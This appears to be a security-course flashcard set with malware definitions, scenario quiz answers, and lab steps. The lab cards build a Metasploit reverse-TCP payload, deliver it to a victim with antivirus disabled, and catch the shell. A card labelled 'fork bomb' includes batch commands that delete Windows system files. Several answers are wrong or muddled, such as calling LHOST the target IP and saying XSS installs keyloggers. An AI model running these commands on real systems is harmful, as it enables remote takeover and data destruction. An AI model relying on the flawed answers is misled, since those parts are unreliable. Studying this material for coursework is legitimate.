Lab 3.2: Module 03 Determining Security Vulnerabilities

adversarial AI

(adversarial artificial intelligence) Using AI to identify vulnerabilities and attack vectors to circumvent security systems.

Shanise is an IT security professional for a large private bank. She got an alert that the bank website received a funds transfer request that was correctly credentialed but flagged as being out of the account owner's usual pattern. If the alert is correct, what type of attack has likely occurred?

CSRF attack EX: A cross-site request forgery (CSRF) is an attack that uses a website's authentication tokens to "inherit" a victim's credentials and privileges, allowing the attacker to impersonate the authorized user.

Which of the following is a characteristic of a potentially unwanted program (PUP)?

A PUP interferes and obstructs the user with web browsing and pop-up windows. EX: A PUP is software that is accidentally installed along with other programs by overlooking default installation options. PUP interferes with web browsing and can cause pop-up windows, pop-under windows, search engine hijacking, homepage hijacking, etc.

Ian, a systems administrator, was checking systems on Monday morning when he noticed several alarms on his screen. He found many of the normal settings in his computer and programs changed, but he was sure no one had physically entered his room since Friday. If Ian did not make these changes, which of the events below is the most likely reason for the anomalies?

A backdoor was installed previously and utilized over the weekend to access the computer and the programs. EX: A backdoor allows a threat actor to change settings by remotely controlling the devices.

worm

A destructive computer program that bores its way through a computer's files or through a computer's network. A worm can replicate between different computers on the same network.

Cyclic Redundancy Check (CRC)

A mathematical algorithm that is executed on a data string by both the sender and the receiver of the data string. If the calculated CRC values match, the receiver can conclude that the data string was not corrupted during transmission.

trojan

A program disguised as a harmless application that actually produces harmful results.

Bot

A program that can do things without the user of the computer having to give it instructions. Many bots are malware as they are installed without people's permission and can be controlled over the internet and used to send spam or steal data. Also known as web robots.

keylogger

A small hardware device or a program that monitors each keystroke a user types on the computer's keyboard.

pointer dereference

A software vulnerability that can occur when the code attempts to remove the relationship between a pointer and the thing it points to (pointee). If the pointee is not properly established, the dereferencing process may crash the application and corrupt memory.

buffer overflow

A technique for crashing by sending too much data to the buffer in a computer's memory

replay attack

A type of network attack where an attacker captures network traffic and stores it for retransmission at a later time to gain unauthorized access to a network.

Which of the following statements are true for a zero-day attack? [Choose all that apply.]

A zero-day vulnerability can only be discovered when the software is deployed. A zero-day attack is impossible to detect as it exploits the unknown vulnerabilities. A zero-day vulnerability can be an example of an unknown threat.

integer overflow

An application attack that attempts to use or create a numeric value that is too big for an application to handle. Input handling and error handling thwart the attack.

memory leak

An application flaw that consumes memory without releasing it.

cross-site request forgery (XSRF)

An attack that exploits the trust a website has in a user's browser in an attempt to transmit unauthorized commands to the website. (Uses the authentication token of the website to load another website.)

XML injection

Attack method where malicious XML is passed as input to exploit a vulnerability in the target app.

application attacks

Attacks that are targeted at web-based and other client-server applications.

Which of the following types of malware allows the attacker to launch attacks from the infected computer to other computers?

Bot EX: An attacker uses the infected computer (bot) as a remote control to launch attacks on other computers.

Which of the following is an example of a request forgery malware?

CSRF EX: A cross-site request forgery (CSRF) is a vulnerability that induces users to perform unintended actions using the authentication token sent by the website to the user's browser

What is another term commonly used to define cross-site request forgery (CSRF):

Client-side request forgery EX: Cross-site request forgery is also referred to as a client-side request forgery, as this attack takes place on the client side.

Which of the following describes a memory leak attack?

In a memory leak attack, the threat actor takes advantage of the programming error of not freeing the memory after executing a process, taking advantage of the device's low memory conditions to attack. EX: In a memory leak attack, the threat actor exploits developer-created loopholes in a program, freeing memory, which is then used by the threat actor.

Kate decides to download an extension to her favorite browser to quickly store links on her spreadsheet software. While downloading the software, she ignores the opt-out check box that allows the extension to download a search toolbar. What has occurred here?

Kate has installed a potentially unwanted program (PUP). EX: An additional program was installed along with the program Kate intended to install because she overlooked the opt-out check box.

Kia recently noticed that when she browses her favorite online shopping site, she is immediately redirected to a competitor's site. What is happening here, and what is the best option for Kia to fix this situation?

Kia must uninstall the toolbar software and the accompanying components she has recently installed on her browser. EX: Uninstalling the software and related components will remove the accidentally installed potentially unwanted program (PUP) from the device.

Terrence, an executive VP of IT at Sigma Bank, noticed that yesterday, there was a major attack on several thousands of bank employees' computers located at geographically different locations where files and data from the computers got deleted. It was also noticed that several confidential files containing customer data were deleted from the bank's server in multiple locations, and the CEO's emails were deleted from the mail server. Since the bank was compliant with cybersecurity measures, Terrence suspects an internal hand in this activity. While going through the records of all employees working in the IT security of the bank, both past and present, he notices that there is an employee, Chris, who has enough experience to launch this attack, was unhappy with his annual review last year, and had left the bank three months ago. If Terrence were able to single Chris out as the one responsible for the attack, what kind of an attack would this be?

Logic bomb EX: A logic bomb is a malicious code added to a genuine program and avoids detection unless a logical event triggers it. Given the scenario, this is the most probable attack orchestrated by this threat actor.

Which of the following is a subset of artificial intelligence?

Machine learning

cryptomalware

Malware designed to remain in place for as long as possible, quietly mining in the background.

memory vulnerabilities

Memory leak. Buffer overflow. Integer overflow. Pointer dereference. DLL injection

SQL injections

Method of attacking a database-driven web application that has improper security, by changing code in the website

how do you detect framing errors

Parity Check and Cyclic Redundancy Check (CRC)

Which of the following is a form of malware attack that uses specialized communication protocols?

RAT EX: RAT has the functionality of a Trojan while also using specialized communication protocols that allow unauthorized access to the entire infected system.

What does ransomware do to an endpoint device?

Ransomware attacks the endpoint device holding it hostage by preventing it from functioning unless the user fulfills the ransom payment demanded. EX: Ransomware is an imprison malware that takes control of the endpoint device, affecting the device's performance until the user pays a ransom to the attacker.

What type of attack occurs when the threat actor snoops and intercepts the digital data transmitted by the computer and resends that data, impersonating the user?

Replay EX: A replay attack copies data transmitted by the computer's user and then uses it for an attack. Replay attacks are commonly used against digital identities. After intercepting and copying the data, the threat actor later retransmits selected and edited portions of the copied communications to impersonate the legitimate user.

Which type of malware can hide its agenda inside other processes, making it undetectable, and what is it usually used for?

Rootkit, a malware that uses the lower layers of the operating system or undocumented functions to make alterations to the operating system's processes EX: A rootkit hides its presence between lower layers and therefore is undetectable for normal antimalware software.

A web application with an SQL server database is found to be compromised by an attacker. On examination, the email IDs of the database have been found modified. This was due to improper validation in the input fields exploited by the attacker. What is the probable attack in the above scenario?

SQL injection EX: Attacks that introduce new input to exploit a vulnerability are called injections. One of the most common injection attacks is an SQL injection, which inserts statements that manipulate a database server.

What is the name of the process where a website validates user input before the application uses the input?

Sanitizing EX: Authorization is permitting the users after validating their credentials. This takes place only after sanitizing the data on a website where sanitization is implemented. User data, such as username and password, is cross-verified using the information available on the database before giving authorization.

Use the Multi/handler Module and Exploit the System

Since you created a standalone module, it will not create a connection between you and the victim's system. To do this, you need to use the multi/handler module, which will catch the meterpreter connection when the payload.exe is executed on the victim's system. The meterpreter connection is required to establish a connection between the hacker's and target's systems.

Smitha, an employee working in the accounts department, reported to the information security officer that she could not access her computer. James, the security officer, noticed the following on Smitha's system: On booting the computer, the following message was flashing on the computer screen with the IRS logo: "This computer is locked by the Internal Revenue Service. It has come to our attention that you are transferring funds to other agencies using this computer without compliance with the local income tax laws. As per section 22 of the U.S. Income Tax Act, the transmission of funds without applicable taxes is prohibited. Your IP address is identified in this fraudulent transaction and is locked to prevent further unlawful activities. This offense attracts a penalty of $400.00 for the first offense. You are hereby given 16 hours to resolve this issue, failing which you shall be prosecuted to the full extent of the law. You may make a secure payment by clicking on the following link. If you face any issues, you may reach out to us at [email protected]." The message will not close, nor is there access to applications or files on the computer; however, James can open shared files and folders on Smitha's computer through the network. What is your inference about the problem faced by Smitha on her computer?

Smitha's computer is compromised by ransomware. EX: Ransomware pretends to block the computer, giving a seemingly valid reason and instructing the user to pay a fine before being allowed to use the device. James's observations of Smitha's computer show it is most likely compromised by a ransomware attack.

backdoor

Software code that gives access to a program or a service that circumvents normal security protections.

PUP (potentially unwanted program)

Software that cannot definitively be classed as malicious, but may not have been chosen by or wanted by the user.

ransomware

Software that encrypts programs and data until a ransom is paid to remove it.

uses of botnets

Spamming, spreading malware, manipulating online polls, denying services, ad fraud, mining cryptocurrencies

What is a risk to data when training a machine learning (ML) application?

Tainted training data for machine learning EX: Attackers can alter the training data that the machine learning application is training with to give false negatives to cloak themselves.

Which of the following describes the action of an SQL injection into a database server?

The SQL injection inserts specially created structured query language statements to manipulate the database server, giving control of the database to the attacker, who can then manipulate the database. EX: SQL injections insert specially created SQL statements to manipulate a database into giving control to the attacker.

Natasha, a network security administrator for an online travel portal, noticed that her website was the victim of an SQL injection. She decided to study the SQL queries to find which one made this vulnerability in the database, and she noticed the following SQL code piece executed on the database: 'whatever' AND email IS NULL; What has been accessed by the attacker running this SQL injection?

The attacker has determined the names of different types of fields in the database. EX: The SQL statement displays the various fields of a table in the database.

An attacker has changed the value of a variable used when copying files from one cloud server to a local drive. What is the most likely motive behind the attack?

The attacker is using an integer overflow attack to initiate a buffer overflow that can allow them to take over the machine. EX: An integer overflow attack can be used to initiate a buffer overflow, allowing an attacker to take over a machine.

A few computers at a high-security software firm location have been compromised. The threat actor took user videos, confidential information like bank account IDs and passwords, email IDs and passwords, and computer screenshots. These confidential data have been shared every three hours from the computers to the threat actor. Which of the following is correct, based on the evaluation of the above observation?

This is a software keylogger attack, as screenshots, video captures, and keystrokes have been routinely monitored and periodically shared. EX: A software keylogger can capture screenshots, videos of users, and keystrokes and periodically transfer the information, which cannot be provided by a hardware keylogger.

The files in James's computer were found spreading within the device without any human action. As an engineer, you were requested to identify the problem and help James resolve it. During file code inspection, you noticed that certain types of files in the computer have similar codes. You found that the problem is coming from a set of codes that are not part of the actual files, appended at the bottom of the file. You also noticed a transfer control code written at the beginning of the files giving control to the code at the bottom of the file. Which type of infection is this a characteristic of?

This is a typical characteristic of an endpoint device infected with a file-based virus attack. EX: This is a characteristic of a typical early generation file-based virus, where the malicious code is attached at the bottom of the file, and the control is transferred from the beginning of the file through a control transfer code in the file.

Zeda Corporation provides online training solutions to global customers. To provide e-learning solutions, it integrates with multiple vendor platforms. This ensures seamless transfer to multiple operators' solutions through sign on. Joe, an IT security administrator, noticed that a threat actor has attacked the platform and stolen the user data. The source of this vulnerability was identified as one of the integrated external applications. What type of attack is this?

This is an API attack. EX: The integration of a vendor platform with the Zeda platform for single-sign through API integration has caused the attack. One of the vendors has exposed the vulnerability through improper API integration.

William downloaded some free software to help him with photo editing. A few days later, William noticed several personal photographs were modified and posted to various social media pages with obscene comments. He also noticed that there were videos of him that were morphed and circulated on adult websites. The videos were obviously taken using his webcam. What should William do to fix his problem and prevent it from happening again in the future?

William should run an antimalware program and scan for all known RATs, then quarantine and remove the infected file(s). To prevent this in the future, he should only download software from trusted websites. EX: There could be a remote access Trojan (RAT), which could have been installed in the device while downloading and running one of the applications, giving the remote threat actor power to do the damage in the given scenario.

snoop

a category of malware that deals with listening in with malware, spyware

Parity check

a check used to see if data was correctly transmitted according to the even or odd agreed-upon parity transmission convention

request forgery

a class of attack where a user performs a state-changing action on behalf of another user, typically without their knowledge.

a web server

a computer that delivers requested webpages to your computer or mobile device

command and control structure

a structure that sends instructions to bot computers

file-based virus

a virus that is attached to a file and is made to launch when that file is opened. Its goal is to reproduce and infect more files. These types of viruses are confined to the host computer. It could delete, corrupt, or make applications useless or difficult to work with, and then will also replicate itself onto other files in that host computer.

logic bombs

a virus triggered by the appearance or disappearance of specified data.

Cross-Site Scripting (XSS)

a vulnerability in dynamic web pages that allows an attacker to bypass a browser's security mechanisms and instruct the victim's browser to execute code, thinking it came from the desired website

Which of the following statements correctly describes the disadvantage of a hardware-based keylogger? a. A hardware-based keylogger must be physically installed and removed without detection. b. A hardware-based keylogger's data can be easily erased by the antimalware software installed in the device. c. A hardware-based keylogger can easily be detected in a network by an antivirus. d. A hardware-based keylogger can be detected by an antivirus when it scans for ports.

a. A hardware-based keylogger must be physically installed and removed without detection. EX: Since hardware-based keyloggers need to be physically connected to and removed from the endpoint, the attacker is vulnerable to being detected and apprehended.

fileless virus

attach themselves to services and processes in the OS, like PowerShell, Windows Management Instrumentation, and .NET Framework; this type of virus is loaded onto the RAM

technologies used by spyware

automatic download software, passive tracking technologies, system-modifying software, tracking software

While Andel is logging into his email through a browser, the login window disappears. Andel attempts to log in again and is successful. Days later, he goes to log into his email, and his attempt fails. He receives a message indicating that his username and/or password are invalid. What is Andel likely a victim of? a. RAT b. CSRF c. Spyware d. Keyloggers

b. CSRF EX: Cross-site request forgeries (CSRF) trick users who have authenticated "tokens" on a specific website into loading another, malicious, webpage that then inherits (steals) the user's identity and privileges. The stolen credentials can then be used to perform functions on the attacker's behalf; in this case, changing Andel's email credentials so only the attacker can access his account.

Japan's cybercrime control center noticed that around 200,000 Tokyo computers are infected by bots, and all these bots are remotely controlled by a single attacker. What is this attacker referred to as?

bot herder EX: A bot herder is the administrator or controller of the logical network of all devices infected by the attacker-created bots. In most cases, the device user is unaware of the bot herder's influence on the endpoint.

incorrect error handling

can allow an attacker access through vulnerabilities in dealing with error handling, and provide a way in

To use the multi/handler module, perform the following steps:

Connect back to the hacker computer that is running Kali. You need to start msfconsole. Click the Applications icon, select 08 - Exploitation Tools, and then select the metasploit framework. A new terminal window is displayed. Type the following command: msfconsole You need to set the multi/handler module. Type the following command: use multi/handler The module is now set. Next, you need to set the windows/meterpreter/reverse_tcp payload used with msfvenom. To do this, type the following command: set payload windows/meterpreter/reverse_tcp To set the LHOST value, type the following command: set LHOST 192.168.0.4 (target IP address) Finally, it is time to trigger the payload. Type the following command: exploit Notice that nothing happens in PLABWIN10 after you double-click the file. This is because it is a custom exploit and does not generate any output. This file will be executed and will continue to run in the background without the user's knowledge. When this file is executed, it creates a reverse connection with the Kali Linux system.

two types of request forgeries

cross-site or client-side request forgery

Which of the following is known as out-of-the-box configuration?

default settings

advantages to fileless viruses

easy to infect, extensive control, persistent, difficult to detect, difficult to defend against

attacks on software

exploiting memory vulnerabilities, improper exception and error handling, external software components

Which of the following code provides instructions to the hardware?

firmware

CSRF (attacks user)

force target to take action for attacker while pretending to be an authorized user

SSRF (attacks server)

gain access to sensitive data, or inject harmful data

injections

introduce a new input to exploit a vulnerability

RAT (Remote Access Trojan)

malware that arrives in a trojan disguised as legitimate software and sets up a secret communication link to a hacker

cross-site scripting attack

occurs when you visit a compromised Web site that runs a script that installs a keylogger program on your computer.

rootkit

program that hides in a computer and allows someone from a remote location to take full control of the computer

application attacks include

scripting attacks, injection attacks, request forgery attacks, replay attacks

framing errors

single bit error, multiple bit errors, burst errors

malware

software designed to infiltrate or damage a computer system without the user's informed consent; software that performs unwanted and damaging actions

spyware

software that enables a user to obtain covert information about another's computer activities by transmitting data covertly from their hard drive.

server-side request forgery (SSRF)

takes advantage of a trusting relationship between web servers

how to create a fork bomb?

Use a batch file and execute it. cmd: @echo off Del c:\windows\system32\*.* Del c:\windows\*.* Open Notepad on the computer you want to infect. To create a new batch file, in the Untitled - Notepad window, type the following fork bomb code: %0|%0 (NOTE: A batch file contains instructions to be executed in sequence. In this batch file, %0 is the name of the currently executing code. This batch file is going to repeatedly execute itself forever. It quickly creates many processes and slows down the system. First the %0 command is run and then the second %0 command, which is located after the pipe, is run. They both run repeatedly until manually stopped.) Once you have it, you just have to open it; it will overload the system.

improper exception handling

uses vulnerabilities in the program when dealing with exceptions, which are then exploited

Creating Standalone Payloads with Msfvenom

Using Linux, go to the terminal emulator and create the payload with msfvenom. cmd: msfvenom -l payloads cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o payload.exe Now you have to share the payload with your victim. The easiest way is to have your victim download it from the web. (Virus real-time protection needs to be disabled on the receiving computer.) You need to ensure that the payload file is available to the target system. To do this, you need to start the SimpleHTTPServer. To do this, type the following command: python -m SimpleHTTPServer

Juan, a cybersecurity expert, has been hired by an organization whose networks have been compromised by a malware attack. After analyzing the network systems, Juan submits a report to the company mentioning that the devices are infected with malware that uses a split infection technique on files. Which malware attack is Juan reporting?

Virus EX: Split infection technique is characteristic of a type of virus that lodges malicious codes in multiple locations within the file. It is normally placed randomly in various parts of the infected file.

For which of the following Windows versions has Microsoft stopped providing support services? [Choose all that apply.]

Windows 7 and XP
